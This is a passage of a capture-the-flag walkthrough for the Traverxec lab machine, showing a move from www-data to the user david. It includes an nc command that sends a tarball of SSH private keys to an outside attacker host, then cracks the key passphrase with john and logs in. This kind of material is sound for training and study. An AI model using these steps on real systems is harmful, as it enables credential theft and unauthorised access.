4 www-data > david
Reading https://www.gsp.com/cgi-bin/man.cgi?section=8&topic=NHTTPD#HOMEDIRS
Trying out http://traverxec.htb/~david/ Not allowed.
# HOMEDIRS [OPTIONAL]
homedirs /home
homedirs_public public_www
means public_www is what is served via nostromo.
Trying out /home/~david/public_www
cd /home/david/public_www
ls -la
total 16
drwxr-xr-x 3 david david 4096 Oct 25 2019 .
drwx--x--x 5 david david 4096 Oct 25 2019 ..
-rw-r--r-- 1 david david 402 Oct 25 2019 index.html
drwxr-xr-x 2 david david 4096 Oct 25 2019 protected-file-area
cd protected-file-area
ls -la
total 16
drwxr-xr-x 2 david david 4096 Oct 25 2019 .
drwxr-xr-x 3 david david 4096 Oct 25 2019 ..
-rw-r--r-- 1 david david 45 Oct 25 2019 .htaccess
-rw-r--r-- 1 david david 1915 Oct 25 2019 backup-ssh-identity-files.tgz
cat .htaccess
realm David's Protected File Area. Keep out!
Transferring backup-ssh-identity-files.tgz over to kali
www-data@traverxec:/home/david/public_www/protected-file-area$ nc -w 3 10.10.16.161 1234 < backup-ssh-identity-files.tgz
<3 10.10.16.161 1234 < backup-ssh-identity-files.tgz
$ tar xvf backup.tgz
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub
NOTE: ssh -i id_rsa does not work still asks for password
┌──(kashz㉿kali)-[~/…/traverxec/home/david/.ssh]
└─$ /usr/share/john/ssh2john.py id_rsa > ssh.hash
┌──(kashz㉿kali)-[~/…/traverxec/home/david/.ssh]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter (id_rsa)
$ ssh -i id_rsa david@10.10.10.165
Enter passphrase for key 'id_rsa':
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
david@traverxec:~$ whoami;id
david
uid=1000(david) gid=1000(david) groups=1000(david),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
Last updated